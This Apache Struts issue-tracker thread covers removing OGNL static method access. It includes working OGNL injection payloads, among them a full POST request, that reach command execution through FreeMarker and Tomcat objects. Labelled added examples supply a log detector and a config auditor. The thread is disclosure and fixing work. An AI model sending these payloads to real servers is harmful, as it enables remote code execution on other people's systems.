[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16758069#comment-16758069 ]

Lukasz Lenart commented on WW-4348:
---

I meant, you cannot use {{#application}} in an HTTP request. You can use this value only inside your code (in JSPs).

> Remove access to static methods
> ---
>
> Key: WW-4348
> URL: https://issues.apache.org/jira/browse/WW-4348
> Project: Struts 2
> Issue Type: Improvement
> Components: Core Actions
> Affects Versions: 2.3.16.3
> Reporter: Lukasz Lenart
> Priority: Critical
> Fix For: 2.5.x
>

--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16751496#comment-16751496 ]

Markus Wulftange commented on WW-4348:
--

What do you mean by it gets blocked from outside? I have used the debugger in devMode like last time and it works that way.
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16748526#comment-16748526 ]

Lukasz Lenart commented on WW-4348:
---

Yeah, but we block access to {{#application}} from outside.
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16747199#comment-16747199 ]

Markus Wulftange commented on WW-4348:
--

Hi [~lukaszlenart], _freemarker.Configuration_ is no longer accessible and neither are _Class_ instances. So the mentioned examples won't work any more. But, at least with Tomcat, there is
{noformat}
#application["org.apache.tomcat.InstanceManager"].newInstance("…")
{noformat}
which can create arbitrary objects via the public argument-less constructor. There are multiple classes that allow RCE that way.
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16744994#comment-16744994 ]

Lukasz Lenart commented on WW-4348:
---

[~mwulftange] could you check with the latest 2.5.20 Struts version?
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15816378#comment-15816378 ]

Markus Wulftange commented on WW-4348:
--

Here is also a _ClassLoader_ bypass:
{noformat}
#application['freemarker.Configuration']['newBuiltinClassResolver'].resolve('freemarker.template.Template',null,null)
{noformat}
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15816136#comment-15816136 ]

Markus Wulftange commented on WW-4348:
--

Well, it works with the latest 2.5.8.
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15815957#comment-15815957 ]

Lukasz Lenart commented on WW-4348:
---

[~mwulftange] but this doesn't work since Struts 2.3.20 as the new Internal Security Mechanism blocks access to particular classes, in this case to {{ClassLoader}}
http://struts.apache.org/docs/security.html#Security-Internalsecuritymechanism
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15809959#comment-15809959 ]

Markus Wulftange commented on WW-4348:
--

No, this can be specified wherever OGNL expressions are evaluated. For example, [via the DebuggingInterceptor|http://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/]:
{noformat}
POST /blank-1.0.0/example/HelloWorld.action HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 670

debug=command=%23application["freemarker.Configuration"]["objectWrapper"].newInstance(
  %23context["com.opensymphony.xwork2.dispatcher.ServletContext"].classLoader.loadClass("freemarker.template.Template"),
  {
    %23application["freemarker.Configuration"]["objectWrapper"].wrap(""),
    %23application["freemarker.Configuration"]["objectWrapper"].wrap("<%23assign+ex%3d\"freemarker.template.utility.Execute\"%3fnew()>${ex(\"xterm\")}"),
    %23application["freemarker.Configuration"]["objectWrapper"].wrap(%23application["freemarker.Configuration"])
  }
).process(
  null,
  %23context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].getWriter()
)
{noformat}
By the way, the given OGNL expression is equivalent to the following standalone code:
{noformat}
new Template(
  "",
  "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"xterm\")}",
  Configuration.getDefaultConfiguration()
).process(
  null,
  new PrintWriter(System.out)
);
{noformat}
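The request quoted in the comment above reaches OGNL through the DebuggingInterceptor, which is only wired in when devMode is on. As an added example (not part of the thread and not Struts project code), the following detection logic scans web-server log entries for that vector from the defender's side: it flags any use of the debug parameter, the command mode specifically, and any parameter name or value that decodes to OGNL touching #application / #context, class loading, or the FreeMarker and Tomcat objects named in this thread. The tab-separated log format, the sample lines, and the assumption that the expression arrives in a separate "expression" parameter are all constructed for the example.

```python
"""Flag requests that reach OGNL through the Struts 2 DebuggingInterceptor.

Added example, not from the WW-4348 thread or the Struts project. The log
format (client<TAB>method<TAB>path[?query]<TAB>body) and the sample lines
are constructed for illustration.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# OGNL constructs the thread shows reaching server-side objects through
# request input: #application / #context lookups, class loading, and the
# FreeMarker / Tomcat objects used to instantiate arbitrary classes.
SUSPICIOUS_OGNL = re.compile(
    r"#(?:application|context)\s*\["
    r"|\.classLoader\b|\.loadClass\("
    r"|freemarker\.(?:Configuration|template\.Template|template\.utility\.Execute)"
    r"|org\.apache\.tomcat\.InstanceManager",
    re.IGNORECASE,
)


def inspect_params(query_or_body):
    """Return a list of findings for one URL-encoded parameter string."""
    findings = []
    params = parse_qs(query_or_body, keep_blank_values=True)
    modes = [m.lower() for m in params.get("debug", [])]
    if modes:
        # Any debug parameter means the DebuggingInterceptor answered, i.e.
        # devMode is enabled on an application that receives outside traffic.
        findings.append("debug parameter present (devMode exposed)")
    if "command" in modes:
        findings.append("debug=command: OGNL evaluation requested")
    for name, values in params.items():
        # Check names as well as values: OGNL in a parameter *name* is the
        # classic Struts injection shape (see the S2-009 advisory linked in
        # this thread). parse_qs already decoded once; decoding a second
        # time also catches double-encoded payloads such as %2523.
        for text in [name, *values]:
            if SUSPICIOUS_OGNL.search(unquote_plus(text)):
                findings.append(
                    f"OGNL reaching server objects via parameter {name!r}")
                break
    return findings


def scan_log(lines):
    """Yield (client, path, findings) for every log line with findings."""
    for line in lines:
        client, _method, target, body = line.rstrip("\n").split("\t", 3)
        parts = urlsplit(target)
        findings = inspect_params(parts.query) + inspect_params(body)
        if findings:
            yield client, parts.path, findings


# Constructed sample log: one benign request, one debug=xml probe, and one
# debug=command request whose expression (deliberately truncated to a
# harmless wrap("") call) reaches #application.
SAMPLE_LOG = [
    "10.0.0.5\tGET\t/blank-1.0.0/example/HelloWorld.action?name=alice\t",
    "10.0.0.7\tPOST\t/blank-1.0.0/example/HelloWorld.action\tdebug=xml",
    "10.0.0.9\tPOST\t/blank-1.0.0/example/HelloWorld.action\t"
    "debug=command&expression=%23application%5B%22freemarker.Configuration%22%5D"
    "%5B%22objectWrapper%22%5D.wrap%28%22%22%29",
]

if __name__ == "__main__":
    for client, path, findings in scan_log(SAMPLE_LOG):
        print(client, path)
        for finding in findings:
            print("  -", finding)
```

The debug parameter itself is the strongest signal: in a production deployment devMode should be off, so any line that triggers the first finding points at a configuration problem regardless of what the expression contains.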
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15809899#comment-15809899 ]

Lukasz Lenart commented on WW-4348:
---

[~mwulftange] but as far as I understand this must be defined as a template by the developer on the server side?
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15801069#comment-15801069 ]

Markus Wulftange commented on WW-4348:
--

Disallowing static methods isn't sufficient. With access to FreeMarker's _BeansWrapper_ instance, it is still possible to create an instance of any class. For example, by creating a FreeMarker _Template_ instance which utilizes the _Execute_ utility, it is still possible to execute arbitrary commands:
{noformat}
#application["freemarker.Configuration"]["objectWrapper"].newInstance(
  #context["com.opensymphony.xwork2.dispatcher.ServletContext"].classLoader.loadClass("freemarker.template.Template"),
  {
    #application["freemarker.Configuration"]["objectWrapper"].wrap(""),
    #application["freemarker.Configuration"]["objectWrapper"].wrap("<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"xterm\")}"),
    #application["freemarker.Configuration"]["objectWrapper"].wrap(#application["freemarker.Configuration"])
  }
).process(
  null,
  #context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].getWriter()
)
{noformat}
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15711283#comment-15711283 ]

Lukasz Lenart commented on WW-4348:
---

It's here to remind us about past vulnerabilities around this functionality. And there is always a chance that we won't be able to fix them and the only option will be dropping it :( As for now we were good at solving the vulnerabilities and now it's safe to use it :)
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15711251#comment-15711251 ]

Michael Krause commented on WW-4348:

Oh good, that is very reassuring. Maybe you can set the resolution to something like 'Not a problem'?
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15709166#comment-15709166 ]

Lukasz Lenart commented on WW-4348:
---

Yeah... we know that, that's why it hangs here ;-)
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15709039#comment-15709039 ]

Michael Krause commented on WW-4348:

Please do not 'fix' this 'bug'. Access to static methods is used in long-living enterprise applications all over the place. You will create a lot of work if you remove this feature.
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091051#comment-15091051 ]

Lukasz Lenart commented on WW-4348:
---

Nope, by defining
{code:xml}
{code}
you'll enable access to static methods; setting {{false}} it'll be disabled. But access to static methods was very often used as a hacker's attack vector on users' applications. See PoC here http://struts.apache.org/docs/s2-009.html
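The setting discussed in the comments above is a struts.xml constant, and the DebuggingInterceptor vector discussed earlier in this thread depends on a second one, devMode. As an added example (not from the thread and not Struts project code), the following script audits a struts.xml for both constants being left in their risky state and produces a hardened copy. The struts.xml content is constructed for the example; the two constant names are the real Struts 2 ones named in this thread, and treating "false" as the safe value for both is the assumption the audit is built on.

```python
"""Audit struts.xml for the constants this thread discusses.

Added example, not from the WW-4348 thread or the Struts project. The
sample document below is constructed; the constant names are the real
Struts 2 ones (struts.ognl.allowStaticMethodAccess from this thread and
struts.devMode, which enables the DebuggingInterceptor).
"""
import xml.etree.ElementTree as ET

# Constructed struts.xml with both constants at their risky value.
SAMPLE_STRUTS_XML = """<struts>
    <constant name="struts.devMode" value="true"/>
    <constant name="struts.ognl.allowStaticMethodAccess" value="true"/>
    <package name="default" extends="struts-default"/>
</struts>
"""

# Constant -> value a production deployment should carry (assumption of this
# audit). Static method access widens what request-controlled OGNL can call;
# devMode exposes the DebuggingInterceptor's OGNL evaluation to any client.
RISKY_CONSTANTS = {
    "struts.ognl.allowStaticMethodAccess": "false",
    "struts.devMode": "false",
}


def audit_struts_xml(xml_text):
    """Return {constant_name: actual_value} for each risky constant that is
    present in the document and not at its safe value."""
    root = ET.fromstring(xml_text)
    problems = {}
    for const in root.iter("constant"):
        name = const.get("name")
        value = (const.get("value") or "").strip().lower()
        if name in RISKY_CONSTANTS and value != RISKY_CONSTANTS[name]:
            problems[name] = value
    return problems


def hardened(xml_text):
    """Return the document with every risky constant forced to its safe value."""
    root = ET.fromstring(xml_text)
    for const in root.iter("constant"):
        name = const.get("name")
        if name in RISKY_CONSTANTS:
            const.set("value", RISKY_CONSTANTS[name])
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for name, value in audit_struts_xml(SAMPLE_STRUTS_XML).items():
        print(f"{name} = {value!r} (expected {RISKY_CONSTANTS[name]!r})")
    print(hardened(SAMPLE_STRUTS_XML))
```

The audit only reports constants that appear in struts.xml; a value can also come from struts.properties or a web.xml init parameter, so an absent constant means "default in effect", not "safe", and the same check is worth running against those sources.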
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091046#comment-15091046 ]

victorsosa commented on WW-4348:

So can I just add into the config file so it starts running the check??
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091016#comment-15091016 ]

victorsosa commented on WW-4348:

This is already implemented, please check com.opensymphony.xwork2.ognl.OgnlUtil.setAllowStaticMethodAccess(String); you only need to set "struts.ognl.allowStaticMethodAccess" true
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091053#comment-15091053 ]

victorsosa commented on WW-4348:

OK so it needs to be false
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091045#comment-15091045 ]

Lukasz Lenart commented on WW-4348:
---

Yes, the idea is to drop such functionality because it's a source of many security vulnerabilities.